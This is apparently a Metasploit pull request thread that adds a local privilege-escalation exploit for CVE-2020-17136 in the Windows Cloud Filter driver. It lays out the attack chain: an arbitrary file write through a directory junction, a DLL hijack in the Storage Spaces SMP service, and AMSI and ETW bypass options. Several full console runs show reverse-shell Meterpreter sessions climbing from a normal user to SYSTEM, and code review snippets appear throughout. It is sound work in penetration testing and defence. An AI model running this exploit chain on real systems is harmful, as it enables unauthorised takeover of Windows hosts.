Create module for CVE-2020-17136: Cloud Filter Arbitrary File Creation EoP
rapid7/metasploit-framework pull request #14585
Opened 2021-01-05 22:47 UTC by gwillcox-r7

This PR adds in support for exploiting CVE-2020-17136, an arbitrary file write vulnerability within `cldflt.sys`. For a more complete explanation of this vuln, see https://bugs.chromium.org/p/project-zero/issues/detail?id=2082&q=CVE-2020-17136&can=1 and https://attackerkb.com/topics/1yvp3hVNSN/cve-2020-17136?referrer=github.

Suffice to say the vuln arises due to a lack of appropriate permission handling when creating placeholder files, which are used within the Cloud Filter driver used by OneDrive to create temporary files to be synced with the cloud at a later date, and we can abuse this to create files that are owned by our low privileged user in directories that our low privileged user shouldn't be able to write to, all cause the filter driver, aka `cldflt.sys`, will create the file as the kernel itself.

There are a bunch of limitations that go into this exploit, most of which are not important for this discussion, however its important to note a few things:

1. This module makes use of a compiled version of the C# PoC James Forshaw released at https://bugs.chromium.org/p/project-zero/issues/detail?id=2082&q=CVE-2020-17136. I made some slight adjustments but a lot of credit goes to him for the original PoC. I simply made some adjustments to allow better integration with Metasploit and to also use the directory junction technique he mentioned, which was not originally included in the PoC.
2. This module uses a DLL hijack in the `Microsoft Storage Spaces SMP` service rather than the usual Fax service DLL hijack we had be using previously. Why? Well this DLL hijack still requires admin privileges to create the file as needed in the `C:\Windows\System32` directory, but unlike the Fax DLL hijack, we don't need to reboot the system to remove the file, and once we have exploited the target, we can immediately clean up the file. Even better, the service itself stops itself after we get our shell. Its a win-win-win all around 🥳 
3. I did have to manually create the directory junction. I'm not sure if we should swap this out with some library code as I didn't see anything to create this at first glance, but just a note for any reviewers that this is an area that may need to be examined.
4. Most of the code is based off of https://github.com/rapid7/metasploit-framework/blob/85a9accbeec063f52406621f124a7f82ad63dcba/modules/post/windows/manage/execute_dotnet_assembly.rb. So if you find stuff that doesn't make sense or should be removed, this is why. I'm open to suggestions on this as there may be options people still want, but I wasn't sure what should be kept or removed; most of it seemed to still have some sort of use.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Get a meterpreter shell as a low privileged user.
- [ ] **Verify** that `getsystem` does not get you a `SYSTEM` shell.
- [ ] `use exploit/windows/local/cve_2020_17136`
- [ ] `set session *session id*`
- [ ] `run`
- [ ] **Verify** that you get a new shell as the `SYSTEM` user

## Example Run on Windows 10 x64 v2004 with November 2020 Patch Updates Applied:

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > set RHOST 172.22.152.177
RHOST => 172.22.152.177
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.22.152.177:4444
[*] Sending stage (200262 bytes) to 172.22.152.177
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-05 16:24:07 -0600

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.22.152.177:4444
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-KUO5CML\normal
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_17136) > show options

Module options (exploit/windows/local/cve_2020_17136):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   AMSIBYPASS      true             yes       Enable Amsi bypass
   ETWBYPASS       true             yes       Enable Etw bypass
   PID             0                no        Pid  to inject
   PPID            0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   PROCESS         notepad.exe      no        Process to spawn
   SESSION                          yes       The session to run this module on.
   Signature       Automatic        yes       The Main function signature (Accepted: Automatic, Main(), Main(string[]))
   USETHREADTOKEN  true             no        Spawn process with thread impersonation
   WAIT            5                no        Time in seconds to wait

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.22.159.28    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x64

msf6 exploit(windows/local/cve_2020_17136) > set LPORT 6633
LPORT => 6633
msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1 
SESSION => 1
msf6 exploit(windows/local/cve_2020_17136) > run

[*] Started reverse TCP handler on 172.22.159.28:6633 
[*] Dropping payload dll at C:\Windows\Temp\PVfQLDnRnZACDAiM.dll and registering it for cleanup...
[*] Running module against DESKTOP-KUO5CML
[*] Launching notepad.exe to host CLR...
[+] Process 7576 launched.
[*] Reflectively injecting the Host DLL into 7576..
[*] Injecting Host into 7576...
[*] Host injected. Copy assembly into 7576...
[*] Assembly copied.
[*] Executing...
[*] Start reading output
[+] Key: 3134236245648
[+] Done
[*] End output.
[+] Execution finished.
[*] Sending stage (200262 bytes) to 172.22.152.177
[*] Meterpreter session 2 opened (172.22.159.28:6633 -> 172.22.152.177:50062) at 2021-01-05 16:25:04 -0600
[*] Session ID 2 (172.22.159.28:6633 -> 172.22.152.177:50062) processing AutoRunScript 'post/windows/escalate/getsystem'
[+] Obtained SYSTEM via technique 4

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotif [...]

2021-01-05 23:02 UTC, gwillcox-r7 commented
Still need to do the following items before this is ready to review:

1. Write up the documentation for this module.
2. Update the exploit with a `check` method that will check to see if `C:\Windows\System32\cldflt.sys` exists and if it has been patched or not. This is particularly important given this exploit only works on Windows 10 v1803 and later.
3. Update the exploit to also support 32 bit targets. This shouldn't be hard but right now we are kind of needlessly limiting ourselves to only 64 bit targets. Will need to do some double checking and minor touchups.

2021-01-06 07:33 UTC, gwillcox-r7 commented
Alright most of these changes should now be done, but we do need to double check that the module still works on a 32 bit system as expected and update the documentation accordingly. Exploit code should be updated so that users can at least try the exploit against a 32 bit system, but atm I haven't checked if this will work.

2021-01-06 14:30 UTC, smcintyre-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +        OptEnum.new('Signature', [true, 'The Main function signature', 'Automatic', ['Automatic'] + SIGNATURES.keys]),
Since you're providing the EXE that's injected for the exploit, the signature will always be the same right?

If that's the case, then this shouldn't be an option since it doesn't make sense to allow the user to set it to something else which could then break the exploit. You should just hard code it to the appropriate value.

2021-01-06 16:18 UTC, gwillcox-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +        OptEnum.new('Signature', [true, 'The Main function signature', 'Automatic', ['Automatic'] + SIGNATURES.keys]),
@smcintyre-r7 Fully agree, will get on to removing this so long. I am curious if there are any others you feel should be removed. I know some of the options like `AMIBYPASS` might still be useful to toggle on or off.

2021-01-06 17:07 UTC, smcintyre-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +        OptEnum.new('Signature', [true, 'The Main function signature', 'Automatic', ['Automatic'] + SIGNATURES.keys]),
IMHO unless there's a compelling reason *not* to enable the bypass options, I'd just leave them enabled and either unregister the options or at least move them into the advanced section.

I'm also guessing that `USETHREADTOKEN` can probably just be enabled all the time. I can't really think of a reason when the user would need to toggle it off and on. Again if you think it's necessary, maybe just moving it to the advanced section so it's less likely to confuse the user.

2021-01-06 17:25 UTC, gwillcox-r7 commented
Alright on closer inspection it seems that the original PoC code was only designed to work on x64. Whilst we could in theory support x86, it would require some reworking of the original exploit to get this to work correctly, and x86 is dying out in popularity these days, so I'm going to leave this for the moment. If there is a demand for x86 down the line we can look into adding support for targeting x86 down the line.

2021-01-06 18:17 UTC, gwillcox-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +        OptEnum.new('Signature', [true, 'The Main function signature', 'Automatic', ['Automatic'] + SIGNATURES.keys]),
Applied updates to address these issues in https://github.com/rapid7/metasploit-framework/pull/14585/commits/3e52debd8bf909a2a38eee9ce5775d791ee4e761. Let me know if that works for you 👍

2021-01-07 22:46 UTC, smcintyre-r7 requested changes

2021-01-07 22:46 UTC, smcintyre-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    cmd_exec("cmd.exe /C \"cd #{dir_junct_path} && mkdir #{intermediate_dir}\"")
This really doesn't need to be an external command. You can instead use the `mkdir` function provided by the `Msf::Post::File` mixin.

When using a Meterpreter session, like you are, you'll get exceptions when it fails and avoid creating a child proess.

2021-01-07 22:46 UTC, smcintyre-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    cmd_exec("cmd.exe /C \"mklink /J #{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir} C:\\\"")
I recently ran into this as well and what you can do instead of running an external command, is use `CreateSymbolicLinkA`. This isn't defined in Railgun but will be once #14582 is landed. At that point you'll be able to check for errors and avoid child processes again.

2021-01-07 22:46 UTC, smcintyre-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    datastore['ARGUMENTS'] = "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}"
The datastore hash really should be abused this way. You should instead use an argument to get the data from here to where it needs to go.

2021-01-07 22:46 UTC, smcintyre-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    cmd_exec('net start smphost')
This should use the `service_start` method that's provided by the `Msf::Post::Windows::Services` mixin.

2021-01-07 22:46 UTC, smcintyre-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    end
You probably want to account for running in a WOW64 context too.

2021-01-07 22:46 UTC, smcintyre-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    rclr = find_required_clr(exe_path)
This doesn't seem necessary at all since you're using a specific executable that you control which should always have the same CLR version.

Looks like you could remove `find_required_clr` altogether.

2021-01-07 22:46 UTC, smcintyre-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    end
Just a minor suggestion here so `WAIT` is only checked once.

```suggestion
    if datastore['WAIT'].positive?
      sleep(datastore['WAIT'])
      read_output(process)
    end
```

2021-01-07 23:02 UTC, gwillcox-r7 commented on external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs
> +                        Console.WriteLine("Key: {0}", key);
Key I believe is the key to the sync root, needed later on to connect to it. I can double check on this though and confirm.

2021-01-07 23:03 UTC, smcintyre-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    cmd_exec("cmd.exe /C \"mklink /J #{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir} C:\\\"")
Nevermind, disregard that I got my `/D` and `/J` flags mixed up. You're trying to create a junction not a symbolic link, my mistake. I don't think we have a mixin method that makes a junction.

2021-01-07 23:05 UTC, gwillcox-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    datastore['ARGUMENTS'] = "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}"
Hmm this was copied from the module code in https://github.com/rapid7/metasploit-framework/blob/85a9accbeec063f52406621f124a7f82ad63dcba/modules/post/windows/manage/execute_dotnet_assembly.rb but I agree this isn't the cleanest.

2021-01-07 23:07 UTC, gwillcox-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    end
Yep agreed this looks a lot better, I'll go ahead and make this change so long.

2021-01-07 23:10 UTC, gwillcox-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    rclr = find_required_clr(exe_path)
Huh yeah I guess I missed this one on my review. Good spotting; I'll make a fix for this so long 👍

2021-01-07 23:15 UTC, gwillcox-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    rclr = find_required_clr(exe_path)
Woops ignore my previous comment. I'm actually not sure about removing this. I think the reason for keeping this in here is that its checking what software the target has installed, including .NET versions, CLR versions etc, before we try execute the binary. Its possible the target may have no .NET framework installed in which case we wouldn't want to inject the C# binary. On that basis I think this is still valuable to keep in the code but correct me if I am wrong.

If we were to remove this the code for `check_requirements` would also have to go, along with the call to `get_dotnet_versions`.

2021-01-07 23:17 UTC, gwillcox-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    end
Thought this was doing this by preventing our exploit from being run under WOW64 as this has not been tested yet? Are you suggesting the exploit should be configured to also run on WOW64? Little confused what you want changed here and need a bit more clarity.

2021-01-07 23:20 UTC, gwillcox-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    cmd_exec('net start smphost')
Should be adjusted with the next commit.

2021-01-07 23:23 UTC, gwillcox-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    datastore['ARGUMENTS'] = "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}"
Ok reworked the method definitions and code for a few methods so that now its passing this around by argument instead of doing a overwrite of the datastore hash which is a lot hackier as you correctly pointed out. Should be fixed with the next commit.

2021-01-07 23:29 UTC, gwillcox-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    cmd_exec("cmd.exe /C \"cd #{dir_junct_path} && mkdir #{intermediate_dir}\"")
Adjusted this code to call `cd()` and `mkdir()` functions using the `Msf::Post::File` mixin. Will be included within the next commit.

2021-01-07 23:32 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/cve_2020_17136.md
> +thereby allowing the attacker to execute arbitrary code as the `SYSTEM` user.
Good point, however the module does have a `SessionTypes` option set to `meterpreter`, so the expectation here is that one would already have a Meterpreter session before using this exploit. I can adjust this to also include `shell` and update the explanation if this would make more sense though.

2021-01-08 14:37 UTC, smcintyre-r7 commented on documentation/modules/exploit/windows/local/cve_2020_17136.md
> +thereby allowing the attacker to execute arbitrary code as the `SYSTEM` user.
The `SessionTypes` option has no relation to the types of payloads that can be used. That field defines what session types are compatible to run the module, not what payloads the module can use.

Most likely the user will select Meterpreter, but there isn't anything stopping them from selecting `windows/shell/reverse_tcp` for example and I see no reason why that wouldn't work except you'd get the permissions of `NETWORK SERVICE` and wouldn't be able to run the exploit again from that session.

2021-01-08 14:40 UTC, smcintyre-r7 commented on external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs
> +                        Console.WriteLine("Key: {0}", key);
I would just clarify what it is. I think "key" is a little too generic and would leave the user wondering if it's something sensitive that they can use.

```suggestion
                        Console.WriteLine("Sync connection key: {0}", key);

```

2021-01-08 14:41 UTC, smcintyre-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    cmd_exec("cmd.exe /C \"cd #{dir_junct_path} && mkdir #{intermediate_dir}\"")
Do you need to change the directory? Why not just `mkdir "#{dir_junct_path}/#{intermediate_dir}"`. You shouldn't need to change the directory if you use an absolute path.

If you change the directory of the session, that will be retained when the user is done with the module and goes back to interacting with the session. If you can avoid context changes like that, it would be nicer for the user.

2021-01-08 14:47 UTC, smcintyre-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    rclr = find_required_clr(exe_path)
Almost, you can and should still check if the target has the .NET framework installed that you need to run this exploit. That's what the `check_requirements` function does right? You pass it the one you need and the ones that are installed and it checks if the requirements are met? Now drilling into that, the one you need is determined by the `find_required_clr` function which analyze your executable. This function can be removed and replaced with a hardcoded CLR version, I'm pretty sure the value is `v4.0.30319` since that executable won't change.

You should be able to remove `find_required_clr` and hardcode the parameter to `check_requirements` since it's static like:

```ruby
    if check_requirements('v4.0.30319', installed_dotnet_versions) == false
      fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
    end
```

2021-01-08 15:37 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/cve_2020_17136.md
> +thereby allowing the attacker to execute arbitrary code as the `SYSTEM` user.
Huh wasn't aware of that thanks for clarifying. I'll update this so long now to correct that so that both shells can be allowed and will update the documentation accordingly with a more appropriate explanation.

2021-01-08 15:38 UTC, gwillcox-r7 commented on external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs
> +                        Console.WriteLine("Key: {0}", key);
Agree, will apply update this now and upload the recompiled binary.

2021-01-08 15:43 UTC, smcintyre-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    cmd_exec("cmd.exe /C \"mklink /J #{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir} C:\\\"")
Ok, I found out that we apparently do have a way to make a directory junction. You can use the file_system mixin and call the `create_mount_point` function. The paths need to be absolute FYI and the first parameter "path" needs to be a directory that already exists.

2021-01-08 15:45 UTC, gwillcox-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    cmd_exec("cmd.exe /C \"cd #{dir_junct_path} && mkdir #{intermediate_dir}\"")
Woops yep your correct, my bad, fixing that now.

2021-01-08 15:51 UTC, gwillcox-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    rclr = find_required_clr(exe_path)
Ah ok yeah I was thinking of doing that but wasn't sure if your intention was to remove the function entirely or not. This suggested change makes sense to me, will go ahead and implement it so long.

2021-01-08 17:21 UTC, gwillcox-r7 commented on modules/exploits/windows/local/cve_2020_17136.rb
> +    cmd_exec("cmd.exe /C \"mklink /J #{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir} C:\\\"")
Thanks, updated the code to use this new method and confirmed its working as expected.

2021-01-08 18:52 UTC, gwillcox-r7 commented
@smcintyre-r7 All issues should now be addressed, and the documentation updated where needed to reflect new changes. Please let me know if there is anything else that needs changing.

2021-01-11 22:11 UTC, smcintyre-r7 approved these changes
Code changes look good and I've tested this and it is reliably working. 

<details>
<summary>Windows 10 v1909 x64</summary>

```
msf6 exploit(windows/local/cve_2020_17136) > sessions -i 7
[*] Starting interaction with 7...

meterpreter > getuid
Server username: DESKTOP-RTCRBEV\aliddle
meterpreter > sysinfo
Computer        : DESKTOP-RTCRBEV
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getsystem 
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background 
[*] Backgrounding session 7...
msf6 exploit(windows/local/cve_2020_17136) > show options 

Module options (exploit/windows/local/cve_2020_17136):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AMSIBYPASS  true             yes       Enable Amsi bypass
   ETWBYPASS   true             yes       Enable Etw bypass
   SESSION     7                yes       The session to run this module on.
   WAIT        5                no        Time in seconds to wait


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows DLL Dropper


msf6 exploit(windows/local/cve_2020_17136) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. A vulnerable Windows 10 v1909 build was detected!
[*] Dropping payload dll at C:\Windows\Temp\CjSVEAibkPXJlzsZ.dll and registering it for cleanup...
[*] Running module against DESKTOP-RTCRBEV
[*] Launching notepad.exe to host CLR...
[+] Process 4380 launched.
[*] Reflectively injecting the Host DLL into 4380..
[*] Injecting Host into 4380...
[*] Host injected. Copy assembly into 4380...
[*] Assembly copied.
[*] Executing...
[*] Start reading output
[+] Sync connection key: 3046210014384
[+] Done
[*] End output.
[+] Execution finished.
[*] Sending stage (200262 bytes) to 192.168.159.30
[*] Meterpreter session 11 opened (192.168.159.128:4444 -> 192.168.159.30:50969) at 2021-01-11 17:08:23 -0500

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > sysinfo 
Computer        : DESKTOP-RTCRBEV
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 
```
</details>

I'm going to land this here pretty soon.

2021-01-11 22:17 UTC, merged

2021-01-11 22:23 UTC, smcintyre-r7 commented
# Release Notes
This adds in support for exploiting CVE-2020-17136, an arbitrary file write vulnerability within cldflt.sys. The result yields local code execution as the Network Service account which is suitable for escalating to SYSTEM via documented techniques.

2021-01-14 12:25 UTC, ddouhine commented
Thx @gwillcox-r7 for this handy module :)

However it fails for me with:
`[-] Exploit aborted due to failure: bad-config: Assembly not found`

By changing:
`exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'`
with the absolute path:
`exe_path = '/opt/metasploit-framework/embedded/framework/data/exploits/CVE-2020-17136/cloudFilterEOP.exe'`
it works fine !

<img width="735" alt="Screenshot 2021-01-14 at 13 15 24" src="https://user-images.githubusercontent.com/4519330/104590571-d3cf4e00-566b-11eb-8173-a45ea98e947a.png">

ps: maybe not the good place to talk about that. Redirect me if needed.

2021-01-14 13:40 UTC, smcintyre-r7 commented
@ddhouine Thanks for letting us know, I spotted the issue and will get a patch to fix it submitted soon.

2021-01-14 18:52 UTC, gwillcox-r7 commented
Just since in case this helps anyone here are the results from testing on 20H2:

<details>
<summary>Windows 10 v2004 x64</summary>
```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set RHOST 172.31.141.214
RHOST => 172.31.141.214
msf6 exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.31.141.214:4444
[*] Sending stage (200262 bytes) to 172.31.141.214
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.31.141.214:4444) at 2021-01-14 12:46:04 -0600

meterpreter > getuid
Server username: DESKTOP-A8KJL0F\normal
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > sysinfo
Computer        : DESKTOP-A8KJL0F
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1 
SESSION => 1
msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.31.131.165
LHOST => 172.31.131.165
msf6 exploit(windows/local/cve_2020_17136) > check
[*] The target appears to be vulnerable. A vulnerable Windows 10 20H2 build was detected!
msf6 exploit(windows/local/cve_2020_17136) > run

[*] Started reverse TCP handler on 172.31.131.165:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. A vulnerable Windows 10 20H2 build was detected!
[*] Dropping payload dll at C:\Windows\Temp\lWKJQGjClgMsKfSh.dll and registering it for cleanup...
[*] Running module against DESKTOP-A8KJL0F
[*] Launching notepad.exe to host CLR...
[+] Process 5208 launched.
[*] Reflectively injecting the Host DLL into 5208..
[*] Injecting Host into 5208...
[*] Host injected. Copy assembly into 5208...
[*] Assembly copied.
[*] Executing...
[*] Start reading output
[+] Sync connection key: 2331990861488
[+] Done
[*] End output.
[+] Execution finished.
[*] Sending stage (200262 bytes) to 172.31.141.214
[*] Meterpreter session 2 opened (172.31.131.165:4444 -> 172.31.141.214:49834) at 2021-01-14 12:46:59 -0600

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-A8KJL0F
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > 
```
</details>

2021-01-14 23:02 UTC, adfoster-r7 commented
@gwillcox-r7 Just a heads-up that I edited your comment to have an extra newline so that it formats correctly :+1: